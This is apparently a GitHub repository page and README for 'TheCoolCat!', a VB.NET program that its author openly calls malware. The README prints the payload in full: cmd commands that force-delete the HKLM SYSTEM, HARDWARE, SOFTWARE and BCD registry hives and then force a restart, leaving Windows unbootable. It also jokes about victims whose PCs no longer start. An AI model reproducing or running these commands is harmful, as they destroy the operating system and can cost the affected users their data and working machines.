- Visual Basic .NET 100%
| .vs/TheCoolCat!/v14 | ||
| AAAAAAAAAAAAA | ||
| AAAAAAAAAAAAA.suo | ||
| LICENSE.txt | ||
| README.md | ||
| TheCoolCat!.sln | ||
TheCoolCat!
TheCoolCat! is basically a malware that I made for my (old) malware channel.
What it does
It just deletes the windows registry and shows messageboxes until your computer crash or restart with the shutdown command
How it works
I made it in jan 2022 (wow it's ~2 years old) and I was very dumb with programming, so I made it in VB.Net for convenience and just executed some CMD commands for the payload
Shell("cmd.exe /c reg delete HKLM\SYSTEM /f")
Shell("cmd.exe /c reg delete HKLM\HARDWARE /f")
Shell("cmd.exe /c reg delete HKLM\SOFTWARE /f")
Shell("cmd.exe /c reg delete HKLM\BCD00000000 /f")
Shell("cmd.exe /c shutdown -r -t 20")
MessageBox.Show("", "", MessageBoxButtons.AbortRetryIgnore)
What happens after restarting
An infinite "Diagnosing your PC"
Can I recover a PC after the payload?
If you have a backup of your registry, otherwize your best move is reinstall Windows. But if you ran it and want to close, you can always force close on the admin panel by clicking on the secret link and putting the user and password "admin":
Why it's TheCoolCat 3.5?
It has 3 versions: version 1.0 & 2.0 are shown on my video, but this is the third version, with nothing really new but an acceptable interface
HEY YOUR IDIOT MY PC DOESN'T BOOT ANYMORE DO SOMETHING
No?